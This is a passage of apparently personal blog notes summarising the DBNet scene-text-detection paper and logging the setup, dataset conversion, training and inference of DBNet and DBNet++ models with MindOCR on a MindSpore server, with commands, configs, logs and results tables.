                best_str += '{}: {:.6f}, '.format(k, v)
            self.logger_info(best_str)
            if save_best:
                import shutil
                shutil.copy(net_save_path, net_save_path_best)
                self.logger_info("Saving current best: {}".format(net_save_path_best))
            else:
                self.logger_info("Saving checkpoint: {}".format(net_save_path))

    def _on_train_finish(self):
        # Runs when training finishes: log all metrics and a completion message.
        for k, v in self.metrics.items():
            self.logger_info('{}:{}'.format(k, v))
        self.logger_info('finish train')

SynthText is a synthetic dataset of 800k images, synthesized from 8k background images. This dataset is used only for pre-training our model.

Data augmentation for training includes:

1. random rotation with an angle in the range $(-10^{\circ},10^{\circ})$;
2. random cropping;
3. random flipping;
4. resizing all processed images to $640\times 640$ for training efficiency.

• The models are pre-trained on the SynthText dataset for 100k iterations,
• then fine-tuned on the corresponding real-world dataset for 1200 epochs.
  • The training batch size is set to 16. We follow a poly learning-rate policy (see the sketch after this list): the learning rate of the current iteration equals the initial learning rate multiplied by $(1-\frac{iter}{max\_iter})^{power}$.
    • The initial learning rate is set to 0.007 and $power$ to 0.9.
    • A weight decay of 0.0001 and a momentum of 0.9 are used.
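A minimal sketch of the poly schedule itself (just the formula above, not the repo's WarmupPolyLR class):

def poly_lr(iter_, max_iter, base_lr=0.007, power=0.9):
    # Poly learning-rate policy: base_lr * (1 - iter / max_iter) ** power.
    return base_lr * (1 - iter_ / max_iter) ** power

max_iter = 100_000
for it in (0, 50_000, 90_000, 99_999):
    print(it, round(poly_lr(it, max_iter), 6))
# The LR decays smoothly from 0.007 toward 0 as training approaches max_iter.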

Ablation study

Shows that each module improves performance.

Comparisons with previous methods

Best on all three metrics: P, R and F.

• TP: true positive. Actually positive, predicted positive.
• FP: false positive. Actually negative, predicted positive.
• TN: true negative. Actually negative, predicted negative.
• FN: false negative. Actually positive, predicted negative.

    $$P=\frac{TP}{TP+FP}$$

    $$R=\frac{TP}{TP+FN}$$

    $$F=\frac{2PR}{P+R}$$
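As a sanity check, P, R and F can be computed directly from these counts; the toy numbers below are chosen to roughly reproduce the first TotalText row further down (a sketch, not real evaluation output):

def prf(tp, fp, fn):
    # Precision, recall and F-measure from the confusion counts above.
    p = tp / (tp + fp)
    r = tp / (tp + fn)
    f = 2 * p * r / (p + r)
    return p, r, f

print(prf(tp=883, fp=117, fn=250))  # -> (0.883, 0.779..., 0.828...): cf. DB-ResNet-18 (800)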


Results on TotalText:

Method               P      R      F
DB-ResNet-18 (800)   88.3   77.9   82.8
DB-ResNet-50 (800)   87.1   82.5   84.7

Results on CTW1500:

Method                 P      R      F
Ours-ResNet18 (1024)   84.8   77.5   81.0
Ours-ResNet50 (1024)   86.9   80.2   83.4

Limitation

One limitation of our method is that it cannot handle the "text inside text" case, i.e. a text instance lying inside another text instance. Although the shrunk text regions help when a text instance is not in the center region of another, the method fails when one instance sits exactly in the center region of another. This is a common limitation of segmentation-based scene text detectors.

Conclusion

It works well.

/posts/Server-MindOCR/

Resources

Getting it running

Getting the code

On the local machine, download mindocr-main.zip from mindocr: MindOCR is an open-source toolbox for OCR development and application based on MindSpore. It helps users to train and apply the best text detection and recognition models, such as DBNet/DBNet++ and CR (gitee.com), and copy it to work/ on the server.

Unzip it:

unzip mindocr-main.zip

This yields the folder mindocr-main; rename it to mindocr.

Creating the environment

Grab a mindspore:2.0.2-alpha image from the AI computing center and open it.

Create a virtual environment:

source activate base
conda create -n mindocr --clone base
conda activate mindocr

Check that MindSpore is usable:

python -c "import mindspore;mindspore.run_check()"
MindSpore version:  2.0.0a0
The result of multiplication calculation is correct, MindSpore has been installed successfully!

Installing dependencies

Since lanms is tricky to install, install it first:

pip install lanms-neo

Then delete the lanms line from requirements.txt.

Under the work/ directory:

cd mindocr
pip install -e .
Successfully built mindocr
Installing collected packages: pyclipper, lmdb, xml-python, shapely, rapidfuzz, opencv-python-headless, mindocr
Successfully installed lmdb-1.4.1 mindocr-0.2.0 opencv-python-headless-4.8.0.74 pyclipper-1.3.0.post4 rapidfuzz-3.1.1 shapely-2.0.1 xml-python-0.4.3

Converting the datasets

TotalText

On Windows, download totaltext.zip from the images link (size = 441 MB) and txt_format.zip from the annotations link (.txt format).

Unzip both archives and organize the files inside as follows:

totaltext
├── Images
│   ├── Train
│   │   ├── img11.jpg
│   │   ├── img12.jpg
│   │   ├── ... (1255 files)
│   ├── Test
│   │   ├── img1.jpg
│   │   ├── img2.jpg
│   │   ├── ... (300 files)
├── Txts
│   ├── Train
│   │   ├── poly_gt_img11.txt
│   │   ├── poly_gt_img12.txt
│   │   ├── ... (1255 files)
│   ├── Test
│   │   ├── poly_gt_img1.txt
│   │   ├── poly_gt_img2.txt
│   │   ├── ... (300 files)

Then re-pack everything as totaltext.zip, upload it to the server, and unzip it (with unzip) into data/ocr_datasets/:

[screenshot]

Go back to the mindocr/ directory and start converting the dataset:

    • Train
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/totaltext/Images/Train/ \
    --label_dir ./data/ocr_datasets/totaltext/Txts/Train/ \
    --output_path ./data/ocr_datasets/totaltext/train_det_gt.txt
    Warning img1075.jpg: skipping invalid polygon [[221, 208]]
    Warning img1083.jpg: skipping invalid polygon [[534, 294]]
    Warning img114.jpg: skipping invalid polygon [[606, 697]]
    Warning img1304.jpg: skipping invalid polygon [[718, 303]]
    Warning img1474.jpg: skipping invalid polygon [[413, 792]]
    Warning img1489.jpg: skipping invalid polygon [[472, 1035]]
    Warning img700.jpg: skipping invalid polygon [[802, 1175]]
    Warning img759.jpg: skipping invalid polygon [[5, 984]]
    Warning img839.jpg: skipping invalid polygon [[491, 1052]]
    Warning img949.jpg: skipping invalid polygon [[947, 324]]
    Conversion complete.
    Result saved in ./data/ocr_datasets/totaltext/train_det_gt.txt
    • Test
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/totaltext/Images/Test \
    --label_dir ./data/ocr_datasets/totaltext/Txts/Test \
    --output_path ./data/ocr_datasets/totaltext/test_det_gt.txt
    Warning img664.jpg: skipping invalid polygon [[5, 340]]
    Conversion complete.
    Result saved in ./data/ocr_datasets/totaltext/test_det_gt.txt

This yields the dataset in the expected format:

totaltext
├── Images
│   ├── Train
│   │   ├── img1001.jpg
│   │   ├── img1002.jpg
│   │   ├── ...
│   ├── Test
│   │   ├── img1.jpg
│   │   ├── img2.jpg
│   │   ├── ...
├── test_det_gt.txt
├── train_det_gt.txt

CTW1500

Download the archive from Yuliang-Liu/Curve-Text-Detector: This repository provides train&test code, dataset, det.&rec. annotation, evaluation script, annotation tool, and ranking. (github.com) and unpack it as follows:

[screenshot]

ctw1500
├── ctw1500_train_labels
│   ├── 0001.xml
│   ├── 0002.xml
│   ├── ...
├── gt_ctw_1500
│   ├── 0001001.txt
│   ├── 0001002.txt
│   ├── ...
├── test_images
│   ├── 1001.jpg
│   ├── 1002.jpg
│   ├── ...
├── train_images
│   ├── 0001.jpg
│   ├── 0002.jpg
│   ├── ...

Re-pack the ctw1500 folder as ctw1500.zip, move it to the server, and unzip it:

[screenshot]

Run the conversion commands under mindocr/:

    • Train
    python tools/dataset_converters/convert.py \
    --dataset_name ctw1500 \
    --task det \
    --image_dir ./data/ocr_datasets/ctw1500/train_images/ \
    --label_dir ./data/ocr_datasets/ctw1500/ctw1500_train_labels/ \
    --output_path ./data/ocr_datasets/ctw1500/train_det_gt.txt
    • Test
    python tools/dataset_converters/convert.py \
    --dataset_name ctw1500 \
    --task det \
    --image_dir ./data/ocr_datasets/ctw1500/test_images/ \
    --label_dir ./data/ocr_datasets/ctw1500/gt_ctw1500/ \
    --output_path ./data/ocr_datasets/ctw1500/test_det_gt.txt

My own dataset

Convert my own dataset into the totaltext format:

    • Train
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/blendertext/images/Train/ \
    --label_dir ./data/ocr_datasets/blendertext/Txts/Train/ \
    --output_path ./data/ocr_datasets/blendertext/train_det_gt.txt
    • Test
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/blendertext/images/Test \
    --label_dir ./data/ocr_datasets/blendertext/Txts/Test \
    --output_path ./data/ocr_datasets/blendertext/test_det_gt.txt

Training

db_r18_totaltext (not as good as the official numbers, but usable) (7.12-7.14)

First edit the dataset path in the config configs/det/dbnet/db_r18_totaltext.yaml (I didn't want to touch it, but it defaults to an absolute path outside work/, so it had to change).

Set dataset_root under both train: dataset: and test: dataset: to your own dataset path; in my case:

dataset_root: ./data/ocr_datasets

Single-card training (worked)

Single-card training (make sure the distribute parameter in the yaml file is False. (Hmm, although True doesn't seem to hurt either.))

    # train dbnet on totaltext dataset
    python tools/train.py --config configs/det/dbnet/db_r18_totaltext.yaml
    [2023-07-12 16:40:01] mindocr.train INFO - Standalone training. Device id: 0, specified by system.device_id in yaml config file or is default value 0.
    [2023-07-12 16:40:07] mindocr.data.builder INFO - Creating dataloader (training=True) for device 0. Number of data samples: 1255
    [2023-07-12 16:40:10] mindocr.data.builder INFO - Creating dataloader (training=False) for device 0. Number of data samples: 300
    [2023-07-12 16:40:13] mindocr.models.backbones.mindcv_models.utils INFO - Finish loading model checkpoint from: /home/ma-user/.mindspore/models/resnet18-1e65cd21.ckpt
    [2023-07-12 16:40:13] mindocr.models.utils.load_model INFO - Finish loading model checkoint from https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet18_synthtext-251ef3dd.ckpt. If no parameter fail-load warning displayed, all checkpoint params have been successfully loaded.
    [2023-07-12 16:40:13] mindocr.optim.param_grouping INFO - no parameter grouping is applied.
    [2023-07-12 16:40:20] mindocr.train INFO -
    ========================================
    Distribute: False
    Model: det_resnet18-DBFPN-DBHead
    Total number of parameters: 12351042
    Total number of trainable parameters: 12340930
    Data root: ./data/ocr_datasets
    Optimizer: SGD
    Weight decay: 0.0001
    Batch size: 20
    Num devices: 1
    Gradient accumulation steps: 1
    Global batch size: 20x1x1=20
    LR: 0.007
    Scheduler: polynomial_decay
    Steps per epoch: 62
    Num epochs: 1200
    Clip gradient: False
    EMA: True
    AMP level: O0
    Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
    Drop overflow update: False
    ========================================

    Start training... (The first epoch takes longer, please wait...)

    [2023-07-12 16:42:13] mindocr.utils.callbacks INFO - epoch: [1/1200], loss: 2.851490, epoch time: 113.039s, per step time: 1823.213ms, fps per card: 10.97 img/s

Damn it, the README.md is vague as hell, but it finally runs. Though this "first epoch takes longer" really is quite a bit longer...

Hilarious: the lab PC died in the middle of the night, which at least taught me how to resume training from a checkpoint

MobaXterm actually crashed halfway through training? Time to set up checkpoint resuming orz: docs/cn/tutorials/advanced_train.md · MindSpore Lab/mindocr - Gitee.com

Add under model: in db_r18_totaltext.yaml:

resume: True

[screenshot]

Then run again:

python tools/train.py --config configs/det/dbnet/db_r18_totaltext.yaml

It prints:

Resume train from epoch: 1049

and training continues!

Analyzing the training results

Final results:

    [2023-07-14 10:27:56] mindocr.utils.callbacks INFO - => Best f-score: 0.8407643312101911
    Training completed!
    [2023-07-14 10:27:56] mindocr.utils.callbacks INFO - Top K checkpoints:
    f-score checkpoint
    0.8408 ./tmp_det/e1110.ckpt
    0.8401 ./tmp_det/e1090.ckpt
    0.8397 ./tmp_det/e1086.ckpt
    0.8397 ./tmp_det/e1089.ckpt
    0.8394 ./tmp_det/e1126.ckpt
    0.8392 ./tmp_det/e1132.ckpt
    0.8392 ./tmp_det/e1149.ckpt
    0.8390 ./tmp_det/e1152.ckpt
    0.8389 ./tmp_det/e1129.ckpt
    0.8389 ./tmp_det/e1139.ckpt

The outputs, the trained checkpoints and the logs can all be found in tmp_det/.

The checkpoint from epoch 1110 performs best!

Epoch   Loss       Recall   Precision   F-score
1110    1.139845   83.43%   84.73%      84.08%

Hmm, the official final results are:

Model   Environment      Backbone    Pretrained on   Recall   Precision   F-score   Train time     Throughput   Config   Weights
DBNet   D910x1-MS2.0-G   ResNet-18   SynthText       83.66%   87.65%      85.61%    12.9 s/epoch   96.9 img/s   yaml     ckpt

A Python script to read result.log and plot the curves:

import matplotlib.pyplot as plt

data = [[], [], [], [], [], []]
epochs = 0
with open('result.log', 'r') as file:
    lines = file.readlines()
    epochs = len(lines) - 1
    for line in lines[1:]:
        for i in range(1, len(line.strip().split())):
            data[i - 1].append(float(line.strip().split()[i]))

fig, axs = plt.subplots(nrows=2, ncols=3)

for i, ax in enumerate(axs.flat):
    ax.plot(range(1, epochs + 1), data[i])
    ax.set_xticks([0, epochs * 1 / 3, epochs * 2 / 3, epochs])
    ax.set_title(lines[0][:-1].split('\t')[i + 1])
    ax.set_xlabel('Epoch')
    ax.set_ylabel('')

plt.tight_layout()

plt.show()

[training curves]

We can see that:

• the loss decreases steadily;
• recall gradually approaches 1;
• precision gradually drops? Is that okay? (ChatGPT says this is normal:)

When training deep neural networks, precision and the F-score (F1) are metrics of classification performance.

• Precision is the fraction of samples predicted positive that are actually positive; it measures how accurate the model's positive predictions are.
• The F1 score combines recall and precision as their harmonic mean; an F1 close to 1 indicates the model maintains both high precision and high recall.

During training it is possible for precision to fall while the F1 score climbs toward 1, especially when the model leans toward increasing recall (capturing as many positives as possible). This typically happens with imbalanced labels or classes, or a high rate of false positives/negatives.

The model then predicts more samples as positive, which increases false positives and lowers precision; but since its predictions lean positive, it also captures more true positives and raises recall, so the F1 score can still trend toward 1, indicating decent overall classification performance.

Note that whether the model's performance meets expectations still has to be judged case by case for the specific task and dataset.

• the F-score gradually approaches 1;

• train_time is slow right from the start, and restarting the run at epoch 1049 wasted a lot of time orz.

Performance at epoch 800 in the original paper:

Method               P      R      F
DB-ResNet-18 (800)   88.3   77.9   82.8

Performance at epoch 800 according to result.log:

Method               P      R      F
DB-ResNet-18 (800)   85.0   83.2   84.0

Good grief, training this thing cost me more than 665 RMB...

Distributed training (RIP)

You also need openmpi 4.0.3 (for distributed training/evaluation).

Download https://download.open-mpi.org/release/open-mpi/v4.0/openmpi-4.0.3.tar.gz, copy it to the server, then:

gunzip -c openmpi-4.0.3.tar.gz | tar xf -
cd openmpi-4.0.3
./configure --prefix=/usr/local
<...lots of output...>
make all install

...which promptly rewards you with a failed installation.

I asked the support staff; no solution so far...

Some other day I'll try the RANK_TABLE_FILE approach.

db_r18_ctw1500 (runs, but never finished) (7.14)

First edit the dataset path in the config configs/det/dbnet/db_r18_ctw1500.yaml:

Set dataset_root under both train: dataset: and test: dataset: to your own dataset path:

dataset_root: ./data/ocr_datasets

Run it!

    python tools/train.py --config configs/det/dbnet/db_r18_ctw1500.yaml
[2023-07-14 10:57:25] mindocr.models.utils.load_model INFO - Finish loading model checkoint from https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet18_synthtext-251ef3dd.ckpt. If no parameter fail-load warning displayed, all checkpoint params have been successfully loaded.
    [2023-07-14 10:57:25] mindocr.optim.param_grouping INFO - no parameter grouping is applied.
    [2023-07-14 10:57:31] mindocr.train INFO -
    ========================================
    Distribute: False
    Model: det_resnet18-DBFPN-DBHead
    Total number of parameters: 12351042
    Total number of trainable parameters: 12340930
    Data root: ./data/ocr_datasets
    Optimizer: SGD
    Weight decay: 0.0001
    Batch size: 20
    Num devices: 1
    Gradient accumulation steps: 1
    Global batch size: 20x1x1=20
    LR: 0.007
    Scheduler: polynomial_decay
    Steps per epoch: 50
    Num epochs: 1200
    Clip gradient: False
    EMA: False
    AMP level: O0
    Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
    Drop overflow update: False
    ========================================

    Start training... (The first epoch takes longer, please wait...)

[WARNING] MD(9900,fffb197fa1e0,python):2023-07-14-10:58:45.969.430 [mindspore/ccsrc/minddata/dataset/engine/datasetops/data_queue_op.cc:832] DetectPerBatchTime] Bad performance attention, it takes more than 25 seconds to fetch a batch of data from dataset pipeline, which might result `GetNext` timeout problem. You may test dataset processing performance(with creating dataset iterator) and optimize it.
[2023-07-14 10:59:43] mindocr.utils.callbacks INFO - epoch: [1/1200], loss: 2.689226, epoch time: 132.242 s, per step time: 2644.840 ms, fps per card: 7.56 img/s
100%|████████████████████████████████████████████████████████| 500/500 [00:59<00:00, 8.42it/s]
[2023-07-14 11:00:43] mindocr.utils.callbacks INFO - Performance: {'recall': 0.8184523809523809, 'precision': 0.8520526723470179, 'f-score': 0.8349146110056926}, eval time: 59.413748025894165
[2023-07-14 11:00:43] mindocr.utils.callbacks INFO - => Best f-score: 0.8349146110056926, checkpoint saved.

But I wanted it to run in the server background, to avoid another midnight MobaXterm disconnect like before:

nohup python tools/train.py --config configs/det/dbnet/db_r18_ctw1500.yaml > test_db_r18_ctw1500.log 2>&1 &

• the trailing "&" runs the program in the background;

• "nohup" keeps the program from being hung up when the session closes;

• "python" runs the Python code;

• "-u" disables output buffering, so print output is flushed to the log file in real time (without -u the log file does not refresh the print output promptly);

• "test.py" stands for the Python source file (substitute your own);

• "test.log" stands for the output log file (name it whatever you like);

• ">" redirects the printed output to the log file;

• "2>&1" redirects stderr into stdout, so error messages also end up in the log file (0 -> stdin, 1 -> stdout, 2 -> stderr).

The almighty Wei-ge advises:

With this approach, if you want to stop midway, your only option is to kill the process.

Otherwise you just wait until it finishes.

So simply rebooting the server works too.

8.2: rerun!

db++_r18_totaltext (hacked together) (7.16)

The original repo doesn't have this option; let's try adding the following directly to db_r18_totaltext.yaml:

use_asf: True             # Adaptive Scale Fusion
channel_attention: True   # Use channel attention in ASF

Run it!

nohup python tools/train.py --config configs/det/test_dbnet/db++_r18_totaltext.yaml > test_db++_r18_totaltext.log 2>&1 &

Analyzing the results (with the same result.log plotting script as above):


[training curves]

Counting the 10 best F-score values across epochs:

def get_top_10(lst):
    # Pair each value with its index via enumerate().
    enumerated_lst = list(enumerate(lst))

    # Sort the (index, value) pairs by value, descending.
    sorted_lst = sorted(enumerated_lst, key=lambda x: x[1], reverse=True)

    # Keep the 10 largest values together with their indices.
    top_10 = sorted_lst[:10]

    return top_10

# Fetch the 10 largest F-scores and their epoch numbers.
result = get_top_10(data[3])

# Print the result.
for index, value in result:
    print(f"epoch: {index + 1}, F-score: {value}")
    epoch: 205, F-score: 0.8386
    epoch: 217, F-score: 0.8376
    epoch: 216, F-score: 0.8375
    epoch: 402, F-score: 0.8372
    epoch: 224, F-score: 0.8371
    epoch: 209, F-score: 0.837
    epoch: 230, F-score: 0.8369
    epoch: 404, F-score: 0.8369
    epoch: 223, F-score: 0.8368
    epoch: 269, F-score: 0.8368

Hmm, the loss keeps falling, but the F-score plateaus quite early. And the final result is actually worse than db_r18_totaltext? What the hell!

Performance at epoch 800 in the original paper:

Method                 P      R      F
DB-ResNet-18++ (800)   84.3   81.0   82.6

Performance at epoch 800 according to result.log:

Method                 P      R      F
DB-ResNet-18++ (800)   85.6   81.4   83.4

Performance at epoch 1024 in the original paper:

Method                  P      R      F
DB-ResNet-18++ (1024)   86.7   81.3   83.9

Performance at epoch 1024 according to result.log:

Method                  P      R      F
DB-ResNet-18++ (1024)   84.9   81.3   83.0

Funny enough, that's worse than at epoch 800.

    db++_r18_ctw1500(8.4)

    nohup python tools/train.py --config configs/det/test_dbnet/db++_r18_ctw1500.yaml > test_db++_r18_ctw1500.log 2>&1 &

    db_r50_totaltext(7.27)

    nohup python tools/train.py --config configs/det/dbnet/db_r50_totaltext.yaml > test_db_r50_totaltext.log 2>&1 &

Analyzing the results:

[training curves]

    db_r50_ctw1500(8.3)

    nohup python tools/train.py --config configs/det/test_dbnet/db_r50_ctw1500.yaml > test_db_r50_ctw1500.log 2>&1 &

db++_r50_totaltext (hacked together)

Trained who-knows-what (7.15-7.16)

The original repo doesn't have this option, so I recklessly spliced db++_r50_icdar15.yaml and db_r50_totaltext.yaml into a db++_r50_totaltext.yaml. The only difference between DB++ and DB is these two lines:

use_asf: True             # Adaptive Scale Fusion
channel_attention: True   # Use channel attention in ASF

Shown here in context:

system:
  mode: 0  # 0 for graph mode, 1 for pynative mode in MindSpore
  distribute: False
  amp_level: 'O0'
  seed: 42
  log_interval: 10
  val_while_train: True
  val_start_epoch: 800
  drop_overflow_update: False

model:
  type: det
  transform: null
  backbone:
    name: det_resnet50
    pretrained: False
  neck:
    name: DBFPN
    out_channels: 256
    bias: False
    use_asf: True  # Adaptive Scale Fusion
    channel_attention: True  # Use channel attention in ASF
  head:
    name: DBHead
    k: 50
    bias: False
    adaptive: True
  pretrained: https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet50_synthtext-40655acb.ckpt

postprocess:
  name: DBPostprocess
  box_type: quad  # whether to output a polygon or a box
  binary_thresh: 0.3  # binarization threshold
  box_thresh: 0.7  # box score threshold
  max_candidates: 1000
  expand_ratio: 1.5  # coefficient for expanding predictions

...

optimizer:
  opt: momentum
  filter_bias_and_bn: false
  momentum: 0.9
  weight_decay: 1.0e-4

...

train:
  ema: True
  ckpt_save_dir: './tmp_det_db++_r50_totaltext'
  dataset_sink_mode: True
  dataset:
    type: DetDataset
    dataset_root: ./data/ocr_datasets
    data_dir: totaltext/images/Train
    label_file: totaltext/train_det_gt.txt

...

eval:
  ckpt_load_path: tmp_det_db++_r50_totaltext/best.ckpt
  dataset_sink_mode: False
  dataset:
    type: DetDataset
    dataset_root: ./data/ocr_datasets
    data_dir: totaltext/images/Test
    label_file: totaltext/test_det_gt.txt
    sample_ratio: 1.0

...

Run it! (The hacked db++_r50_totaltext.yaml lives under test_dbnet/.)

    nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_totaltext.yaml > test_db++_r50_totaltext.log 2>&1 &
    ========================================
    Distribute: False
    Model: det_resnet50-DBFPN-DBHead
    Total number of parameters: 25613196
    Total number of trainable parameters: 25559564
    Data root: ./data/ocr_datasets
    Optimizer: momentum
    Weight decay: 0.0001
    Batch size: 32
    Num devices: 1
    Gradient accumulation steps: 1
    Global batch size: 32x1x1=32
    LR: 0.007
    Scheduler: polynomial_decay
    Steps per epoch: 39
    Num epochs: 1200
    Clip gradient: False
    EMA: True
    AMP level: O0
    Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
    Drop overflow update: False
    ========================================

Hilariously, it really runs.

(7.16) It made it to epoch 800, then died when evaluation kicked in:

RuntimeError: Single op compile failed, op: assign_3372008743488672465_0.

Resuming from the checkpoint made it run again? Strange.

Then the F-score came out terribly low; this model is probably ruined. Ctrl + Z, shelving it for now.

[training curves]

Rerun (7.26)

Let's try adding directly to db_r50_totaltext.yaml:

use_asf: True             # Adaptive Scale Fusion
channel_attention: True   # Use channel attention in ASF

Run it!

nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_totaltext.yaml > test_db++_r50_totaltext.log 2>&1 &

Analyzing the results:

[training curves]

The 10 best checkpoints:

[2023-07-27 05:32:23] mindocr.utils.callbacks INFO - Top K checkpoints:
f-score   checkpoint
0.8546    ./tmp_det_db++_r50_totaltext/e584.ckpt
0.8544    ./tmp_det_db++_r50_totaltext/e616.ckpt
0.8543    ./tmp_det_db++_r50_totaltext/e745.ckpt
0.8542    ./tmp_det_db++_r50_totaltext/e582.ckpt
0.8542    ./tmp_det_db++_r50_totaltext/e623.ckpt
0.8541    ./tmp_det_db++_r50_totaltext/e744.ckpt
0.8541    ./tmp_det_db++_r50_totaltext/e620.ckpt
0.8540    ./tmp_det_db++_r50_totaltext/e741.ckpt
0.8540    ./tmp_det_db++_r50_totaltext/e615.ckpt
0.8540    ./tmp_det_db++_r50_totaltext/e747.ckpt

This is the best-performing model so far.

Performance at epoch 800 in the original paper:

Method                 P      R      F
DB-ResNet-50++ (800)   87.9   82.8   85.3

Performance at epoch 800 according to result.log:

Method                 P      R      F
DB-ResNet-50++ (800)   86.3   83.9   85.1

Performance at epoch 1024 in the original paper:

Method                  P      R      F
DB-ResNet-50++ (1024)   88.5   82.0   85.1

Performance at epoch 1024 according to result.log:

Method                  P      R      F
DB-ResNet-50++ (1024)   85.8   83.4   84.6

    db++_r50_ctw1500(8.5)

    nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_ctw1500.yaml > test_db++_r50_ctw1500.log 2>&1 &

My own dataset (8.24)

nohup python tools/train.py --config configs/det/test_dbnet/db_r18_blendertext.yaml > test_db_r18_blendertext.log 2>&1 &

Inference (7.26, 7.29)

Offline inference only works on Ascend 310, but the server is Ascend 910, so that's a dead end.

After pestering the Huawei support staff, they said online inference can be used: set --image_dir, --det_algorithm and --det_model_dir, then run it!

Except it turns out this inference only supports resnet50? Lame.

And it only draws rectangular boxes? Good grief.

Ground Truth

• 0999.jpg

[image: 0999.jpg]

• Ground Truth

0999.jpg	[{"transcription": "CHILDREN'S HOSPITAL", "points": [[57, 240], [104, 247], [151, 248], [198, 251], [245, 250], [292, 250], [340, 247], [343, 263], [295, 265], [247, 267], [199, 268], [152, 265], [104, 263], [57, 261]]}]
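To eyeball an annotation like this, the polygon can be drawn back onto the image. A minimal sketch of mine, assuming the converted label format is the image name, a tab, then a JSON list of instances (paths simplified):

import json

import cv2
import numpy as np

# Read one line of the converted annotation file.
line = open('train_det_gt.txt', encoding='utf-8').readline()
name, anno = line.strip().split('\t', 1)

img = cv2.imread(name)
for inst in json.loads(anno):
    pts = np.array(inst['points'], dtype=np.int32)
    cv2.polylines(img, [pts], isClosed=True, color=(0, 255, 0), thickness=2)
cv2.imwrite('gt_vis.png', img)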

Official model

dbnet_resnet50_td500-0d12b5e8.ckpt

A trained checkpoint downloaded from the official docs: dbnet_resnet50_td500-0d12b5e8.ckpt from configs/det/dbnet/README_CN.md · MindSpore Lab/mindocr - Gitee.com.

    python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.png \
    --det_algorithm DB \
    --det_model_dir ./dbnet_resnet50_td500-0d12b5e8.ckpt \
    --draw_img_save_dir ./inference_results/
    [2023-07-29 10:54:44] mindocr.models.backbones.mindcv_models.utils INFO - Finish loading model checkpoint from: /home/ma-user/.mindspore/models/resnet50-e0733ab8.ckpt
    [2023-07-29 10:54:45] mindocr.models.utils.load_model INFO - Finish loading model checkoint from ./dbnet_resnet50_td500-0d12b5e8.ckpt. If no parameter fail-load warning displayed, all checkpoint params have been successfully loaded.
    [2023-07-29 10:54:45] mindocr INFO - Init detection model: DB --> dbnet_resnet50. Model weights loaded from ./dbnet_resnet50_td500-0d12b5e8.ckpt
    [2023-07-29 10:54:45] mindocr INFO - Pick optimal preprocess hyper-params for det algo DB:
    {'DetResize': {'target_size': None, 'keep_ratio': True, 'limit_side_len': 960, 'limit_type': 'max', 'padding': False, 'force_divisable': True}}
    [2023-07-29 10:54:45] mindocr.data.transforms.det_transforms INFO - `limit_type` is max. Image will be resized by limiting the max side length to 960.
    [2023-07-29 10:54:45] mindocr INFO -
    Infering [1/1]: data/ocr_datasets/ctw1500/train_images/0999.jpg
    [2023-07-29 10:54:45] mindocr INFO - Original image shape: (378, 620, 3)
    [2023-07-29 10:54:45] mindocr INFO - After det preprocess: (3, 384, 640)
    [2023-07-29 10:55:08] mindocr INFO - Num detected text boxes: 2
    [2023-07-29 10:55:08] mindocr INFO - Done! Text detection results saved in ./inference_results/

    会在 inference_results/ 里获得 0999_det_res.pngdet_results.txt

    • det_results.txt
    0999.jpg[[[226, 253], [342, 249], [342, 262], [226, 266]], [[67, 243], [209, 252], [208, 268], [66, 259]]]
    • 0999_det_res.png

    png

    自己的丹

    tmp_det_db_r50_totaltext/best.ckpt
    python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.png \
    --det_algorithm DB \
    --det_model_dir ./tmp_det_db_r50_totaltext/best.ckpt \
    --draw_img_save_dir ./tmp_det_db_r50_totaltext/inference_results/
    • det_results.txt
    0999.jpg[[[221, 247], [345, 243], [346, 270], [222, 275]], [[55, 237], [210, 248], [208, 275], [53, 264]]]
    • 0999_det_res.png

    png

    居然差这么多……感觉参数不太一样……

    tmp_det_db++_r50_totaltext/best.ckpt
    python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.png \
    --det_algorithm DB \
    --det_model_dir ./tmp_det_db++_r50_totaltext/best.ckpt \
    --draw_img_save_dir ./tmp_det_db++_r50_totaltext/inference_results/
    • det_results.txt
    0999.jpg[[[224, 248], [345, 244], [346, 267], [225, 272]], [[55, 239], [208, 247], [206, 274], [54, 266]]]

    可用参数

    查看 tools/infer/text/config.py,有如下参数可用:

    def create_parser():
    parser_config = argparse.ArgumentParser(description="Inference Config File", add_help=False)
    parser_config.add_argument(
    "-c", "--config", type=str, default="", help='YAML config file specifying default arguments (default="")'
    )

    parser = argparse.ArgumentParser(description="Inference Config Args")
    # params for prediction engine
    parser.add_argument("--mode", type=int, default=0, help="0 for graph mode, 1 for pynative mode ") # added
    parser.add_argument("--det_model_config", type=str, help="path to det model yaml config") # added
    parser.add_argument("--rec_model_config", type=str, help="path to rec model yaml config") # added

    # params for text detector
    parser.add_argument("--image_dir", type=str, help="image path or image directory")
    # parser.add_argument("--page_num", type=int, default=0)
    parser.add_argument(
    "--det_algorithm",
    type=str,
    default="DB++",
    choices=["DB", "DB++", "DB_MV3", "PSE"],
    help="detection algorithm.",
    ) # determine the network architecture
    parser.add_argument(
    "--det_amp_level",
    type=str,
    default="O0",
    choices=["O0", "O1", "O2", "O3"],
    help="Auto Mixed Precision level. This setting only works on GPU and Ascend",
    ) # added
    parser.add_argument(
    "--det_model_dir",
    type=str,
    default=None,
    help="directory containing the detection model checkpoint best.ckpt, or path to a specific checkpoint file.",
    ) # determine the network weights
    parser.add_argument(
    "--det_limit_side_len", type=int, default=960, help="side length limitation for image resizing"
    ) # increase if need
    parser.add_argument(
